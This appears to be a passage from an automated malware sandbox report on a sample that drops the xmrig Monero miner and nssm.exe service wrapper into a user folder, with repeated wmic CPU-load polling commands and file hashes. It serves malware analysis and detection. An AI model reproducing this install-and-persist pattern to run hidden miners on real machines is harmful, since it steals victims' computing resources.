C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2868

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:3176

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1856

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:3004

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2664

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1620

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:3340

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:4900

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:3776

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:3616

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1612

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2704

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:3752

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:112

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4992

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:3692

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2268

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1092

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2136

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1340

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1000

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1400

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:4888

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:772

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1456

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:3648

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2796

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1384

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:4388

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4612

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:3708

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1932

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:3220

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:3780

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:868

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1592

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1576

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:4540

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:512

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4988

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1336

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1776

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:5036

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:4564

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:3316

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4448

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:4444

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4504

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2412

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2332

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:3340

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:3776

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:4920

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:3616

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:3348

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:4044

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4228

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4048

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1684

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4580

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4756

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:3752

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1132

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2056

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:864

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2964

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4944

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1340

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:368

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2344

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:632

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:640

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4632

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:3448

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:3456

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2904

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1140

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:3960

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:5020

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:348

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:1100

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1120

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:3708

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4128

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2120

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:4604

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:5068

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1292

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:5052

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2304

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2228

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1868

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:3548

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4740

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2888

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4560

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1708

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:3536

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2940

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:5036

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:3140

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4424

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1940

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:4100

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:3440

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:5060

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:4900

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2972

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:3776

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:4036

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:5076

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:3724

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:4216

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:400

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1224

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:3864

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2052

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:3596

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1388

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:3524

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:408

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:864

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:1900

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1000

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1340

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2128

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:432

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:632

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2316

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:388

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:840

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1456

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4764

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2796

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1804

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4388

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:5080

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
PID:5112

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:5008

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:3780

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4132

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2304

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:2280

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2616

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1872

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1056

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2888

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4768

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:4560

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1856

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4584

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:968

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4884

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:5036

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:452

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4212

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2124

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:4836

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2860

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4900

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:4920

C:\Users\Admin\moneroocean\nssm.exe
C:\Users\Admin\moneroocean\nssm.exe
1⤵
- Executes dropped EXE
PID:1128

C:\Users\Admin\moneroocean\xmrig.exe
"C:\Users\Admin\moneroocean\xmrig.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3900

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
1cbaf8f4f26a3bf4f1457d2aa958e86b

SHA1
da0ca5becc1ca34164fa7ea11725027ae5f86f1a

SHA256
f1a1cbcd2a0da3c6c031ba0794863803fc0128ffd0b85718e1690fe509c80d68

SHA512
120a77836942a48397c87f0c3e14a0fae82aef114d3f7431413f48dc41d63d0d2289e13903b1168c895aae329c7beea1f3a4f8aa52b3221c03dc4bf1b273d8d4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
0b42b9b3dcaf74eb678c8ae3e5a93b31

SHA1
f5a81d69824122b924215eb4c285d993b4e1cb31

SHA256
695642b72e71488786ae2299f3c62317cf91f4b18c3dfbf4895519974839682e

SHA512
383aa39c9194dcbf8cc9442106637c9bf1caedf38eef0277bdb08d108525e6db18430eca90bae6005427d794b27c9ba0a5b690ec2adca94b1dd01fe4334af5f2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
e19379fa13008a264b8801e2cbb9f150

SHA1
d7fe55300709fa03accb2847278d9047e1b22fd7

SHA256
f3a21bb5091d1fab430c4fa097dac868cb674c5b3768678fe9c0ef81b920cc72

SHA512
64e3ff9b8fa46eb2fd8165d23538ffe03fb5c5096f77a800763c17795df0a6b58062b14f0807c24e73b6721fb78eee86b785e87f75a7f0ed55eda0f33811b712

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
891be73af9b1da61d6efb2ca93bc9993

SHA1
f98ccf49771396ffcda476d35fb0da3a7a0c8886

SHA256
652162b9c93bb69a57b74ab2d014adaa4d8690af32ec2349d8a16e704a8489a8

SHA512
c999a61333a94e780ef01cb0b9a88373fcf5d890383f813a73a6700ef90d84700a9604ecfc82dfdeea043ec0f3194836291291ec5cd214e915671db547251bef

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
633da34a38638896c9a56c65a984d48a

SHA1
1ecc48e2ec10396bbe8972facf94a28d4a20635b

SHA256
2fa8e367aeb35f24f88785d48e2058b217aa3479e61c65d25a94be0d73c98dfa

SHA512
79ee129be3599bb324d25e6c58c2b685499cb401d24860431dead811cc70841d892a24554398e65dc4e47e997e2e2c569d4f3a7cf38cedd36088897314e7d1fe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
16ab7fb969c0115d53744649663f4b30

SHA1
fd799885e8f89be8f88e47ff85b7b5b2310bcd50

SHA256
959455fbd09381e6e3d5f447f0372423829328b005b613202129a283a2b13ff3

SHA512
8cb7786a8063ddb2034d36fbc80918b6018f9128325fb6150c69279cd6f19c42f19ce2c0d1b7491cb5ea834c1d8d3468378f6b1b68163a989bc028bd8cdaff9c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
d5a6408e58a8e6cdcac441b2724bdeea

SHA1
c32347262903a5db5422c41c280fe975731155a1

SHA256
6927aa1bd6f5b470b786b77ac7deac1ac4afcfa7650bc5c72358b3e8462e32d3

SHA512
f630fa6616ed5aeb1c875f1573de5ca3db917ff6b2d5cb8d3da37ae9e45104a8ebf46b2504d1281b9d3b6705bbf3422c9b40c20b64417ef932c68b314e3aee14

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
612b19feac3b60bdc771ec888769ea75

SHA1
cc0117dc3f83e139f22d7c9f068a0fa2027fc8fb

SHA256
3eb12f5e02a7aad8764186e1f62d9cebcc8667c854ebf4356fe404f042b84ec1

SHA512
2f56333015641eb11b853a350ca5a01763ab9fd2d572fca51ba2d7df3018546c9667a64ba670e443e0fef5c10879964bfe18084ae0b44e95cb17dcc864ffd4af

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
53d22c6886e95e969092ef5b79b495a7

SHA1
0ae8097459f117c828f6f8fda33510ed2aadc684

SHA256
1b13703268f52968cdc03f76d4e23ad73ab29aa87050dcc4c3a031031dcb37fa

SHA512
9dd6b5de657212900d732377ea5654b46261e8149340a20f9ba166aeae231aea3bca5f7d280d9dd1d47e9d72e6bf9c7b635208bd695fcb480e44a9bb94b7814e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
64B

MD5
52bf9d9a16992d287379501ef216818e

SHA1
917801b9de876bcee9e1ffe4d536b4ac9c726993

SHA256
046e6a5c3e69f8af30387182375919d7f4b7c40d815f0eaa71fc5eee5aeb8862

SHA512
0a0b64de2bc3ab2f6e4e573782f89baaf0e74f43e67508dab267ad4e866f704e9e159bc693e01ffbcb816f69328fa58eed1187bb294e2c1155aeb4d717569b0b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
5b5352c55a8e79ac8de4be3202d496a1

SHA1
4a263d9e36e5ef972e4b19035cae169e1df6459c

SHA256
eff52a77e2fd653199c31162fbd5557a83995ef0e6e0570bf6495d1b5386b3b8

SHA512
c4e5e245c427bc6f9cc95ae80efbd46fd432bea5a4f9366332b1850d833316e6f4eab0e25259b2ea39c40724dcae91ba748234cb1a3cf95b38d8fed162741d63

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bmizyzsi.e0u.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp73F7.tmp.bat
Filesize
14KB

MD5
623f6006f683afdb4b7406e3a4ec35bf

SHA1
f63f03d7338317224726eba368f1a045fa2142d7

SHA256
21d6e0b0e8135a929a77f48e00d286bfa4fc2d749a61529e559b8a5ceb63e47b

SHA512
df7ae1e436be99bbf9ec7fe1fb745c9e2dba6b99e24019b5b1f78786198f1aed465575a829e9b8141bc92f0a4c4269e140228b4335f9fa724a60f1330ad6d3ab

Download Submit
C:\Users\Admin\moneroocean\config.json
Filesize
2KB

MD5
64cafb884608c751a2bccaca7c582e0f

SHA1
924f71ecb4903ab63a13a125e62fd6e5f5d20cb2

SHA256
3250e852f2fb3e61bd0642d92f1decac666777da7c4d59d6270ee49fc856151b

SHA512
ddd68d3d13bd65f926f6be67ac891c143d6e282ee955871382452f2627ca42ed54e7363d83651b904cdf8054bc1d12a02becd44ac1b5cdc98ac42fc7ebfe97a0

Download Submit
C:\Users\Admin\moneroocean\config.json
Filesize
2KB

MD5
66ab7ec4a5b8e75dffdd6b00b6ace249

SHA1
96bfc28f7d4eefdfb4ce0e7a6032256ce1d8a6b8

SHA256
ff712b601e65d5b3bec40e88b1b7b262d387b0c0252497aa1c263f6e5af1fac0

SHA512
944260c2d727d8ba3b9c22eb57a8fb454d26a594a61f31f967c7c73cf38aed7519a7965af8fe048e78c6599be01fc1262b6c4f90c2a680d039763ec81237b107

Download Submit
C:\Users\Admin\moneroocean\config.json
Filesize
2KB

MD5
e7f88af2a9b08d6dbfb752302cbf36cf

SHA1
a371ca634dff012149120983cda2e23605ce1142

SHA256
834f64b433b86246787211001bbc2fdbd0c10e6cd809a06a6742bed45037e5a4

SHA512
6a5c696757c5e7fbd621bc0fa522b477042a67cfe12413fa13772caf5dbe784084245dc930e96c3fbf0ba7a007a428fe808b530dd06a76e69593dd77512f18c3

Download Submit
C:\Users\Admin\moneroocean\config.json
Filesize
2KB

MD5
4a362654a7ee00e9d95b324bb15c6e93

SHA1
af58cd343332340ac713eff7134807fb41df7ae7

SHA256
2f90ea5ec5c732d3aa1eac2cf78e8325fe4cd7fc511d3dcdf8196d6569bd7239

SHA512
c9068fbe769ee65c37b6b81100a4b7597d9e5e502f7d60e980a9f9b53184835f185db094242c0da54cbc631f5729a43dd08ea3eb8decab966adfeb79b6a70d7d

Download Submit
C:\Users\Admin\moneroocean\config.json
Filesize
2KB

MD5
d4f8a13f8c90e2b3b2e7d30a553df39c

SHA1
5c5303ef682ffcd31e57d1abd900ba5b637d51e4

SHA256
f7fc5b53e709adc1f4116ff47656f7262d7fb2859a100b3e3a5568453485649a

SHA512
68b0b59a732fecc8b345fa0429039d36bc3031ab65198e4d3783a5c16fa768bb6562131c1db58d00ad9c4af7fd8d77aed3c2150930663280a6bbd635ba5831bd

Download Submit
C:\Users\Admin\moneroocean\config.json
Filesize
2KB

MD5
c9ef9c214996db3d88f571226910c5d5

SHA1
420ba30247b1e09f706557a7704a1ebee5d3165c

SHA256
fa55a24dccbf28309642d958cbb73f5053e3a56baa0eda22d4581e0151f5f7c1

SHA512
de91ef4268e67c4fa8d7216637bd9ca69ea33b108352675c954d4719d2d58b9414df78c6ebc8f622fcfbeda4ad5f981c2a17a48f7eeae8626cefe5b6894ec68d

Download Submit
C:\Users\Admin\moneroocean\config.json
Filesize
2KB

MD5
725d38d9eeadc9c2691063936b01f9ec

SHA1
153fd5bd55cfd845516562291a7ab867d68145b5

SHA256
0df3cdd812a582b5ddf5c8019fe7aecf03edb5760f4cf2d0c81ba73590a2ec43

SHA512
fe2758ddaa974696c733367d479dc54695ee1f177275f3b26d575b3c27b8c968b6bab0ce1e5b715e6513d1f39d880462b3d8cc542507f2eeae531a9a6d337658

Download Submit
C:\Users\Admin\moneroocean\nssm.exe
Filesize
360KB

MD5
1136efb1a46d1f2d508162387f30dc4d

SHA1
f280858dcfefabc1a9a006a57f6b266a5d1fde8e

SHA256
eee9c44c29c2be011f1f1e43bb8c3fca888cb81053022ec5a0060035de16d848

SHA512
43b31f600196eaf05e1a40d7a6e14d4c48fc6e55aca32c641086f31d6272d4afb294a1d214e071d5a8cce683a4a88b66a6914d969b40cec55ad88fde4077d3f5

Download Submit
C:\Users\Admin\moneroocean\xmrig.exe
Filesize
9.0MB

MD5
9ee2c39700819e5daab85785cac24ae1

SHA1
9b5156697983b2bdbc4fff0607fadbfda30c9b3b

SHA256
e7c13a06672837a2ae40c21b4a1c8080d019d958c4a3d44507283189f91842e3

SHA512
47d81ff829970c903f15a791b2c31cb0c6f9ed45fdb1f329c786ee21b0d1d6cd2099edb9f930824caceffcc936e222503a0e2c7c6253718a65a5239c6c88b649

Download Submit
C:\Users\Admin\nssm.zip
Filesize
135KB

MD5
7ad31e7d91cc3e805dbc8f0615f713c1

SHA1
9f3801749a0a68ca733f5250a994dea23271d5c3

SHA256
5b12c3838e47f7bc6e5388408a1701eb12c4bbfcd9c19efd418781304590d201

SHA512
d7d947bfa40d6426d8bc4fb30db7b0b4209284af06d6db942e808cc959997cf23523ffef6c44b640f3d8dbe8386ebdc041d0ecb5b74e65af2c2d423df5396260

Download Submit
C:\Users\Admin\xmrig.zip
Filesize
3.5MB

MD5
640be21102a295874403dc35b85d09eb

SHA1
e8f02b3b8c0afcdd435a7595ad21889e8a1ab0e4

SHA256
ed33e294d53a50a1778ddb7dca83032e9462127fce6344de2e5d6be1cd01e64b

SHA512
ece0dfe12624d5892b94d0da437848d71b16f7c57c427f0b6c6baf757b9744f9e3959f1f80889ffefcb67a755d8bd7a7a63328a29ac9c657ba04bbdca3fea83e

Download Submit
memory/1776-40-0x00000212E9230000-0x00000212E9242000-memory.dmp

Filesize
72KB

Download
memory/1776-39-0x00000212E7080000-0x00000212E708A000-memory.dmp

Filesize
40KB

Download
memory/1804-11-0x00007FFD79250000-0x00007FFD79D11000-memory.dmp

Filesize
10.8MB

Download
